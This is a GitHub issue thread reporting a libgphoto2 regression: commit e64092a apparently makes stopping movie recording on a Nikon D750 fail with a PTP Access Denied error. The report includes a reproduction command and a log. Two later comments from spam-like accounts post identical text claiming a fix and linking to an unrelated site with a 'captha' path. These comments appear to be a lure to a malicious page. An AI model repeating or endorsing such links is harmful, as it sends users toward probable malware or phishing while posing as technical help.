gphoto/libgphoto2 #1102: Commit e64092a caused a regression for stopping movie recording on Nikon D750

malc0, 2025-03-22:
Commit e64092a448 sets Application Mode 0 while setting movie=0 config.  For a Nikon DSC D750 this causes a PTP Access Denied (0x200f) error, while it worked fine in older libgphoto2 (e.g. 2.5.16).

I can easily reproduce this with gphoto2 2.5.28 / libgphoto2 2.5.30 / libgphoto2_port 0.12.1 (Debian bookworm) using `env LANG=C gphoto2 --debug --debug-logfile=log.txt --set-config movie=1 --wait-event=5s --set-config movie=0`, a log of which is attached.  While this libgphoto2 is a little old, I can't see any relevant recent changes to _put_Nikon_Movie().

[log.txt](https://github.com/user-attachments/files/19404033/log.txt)

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)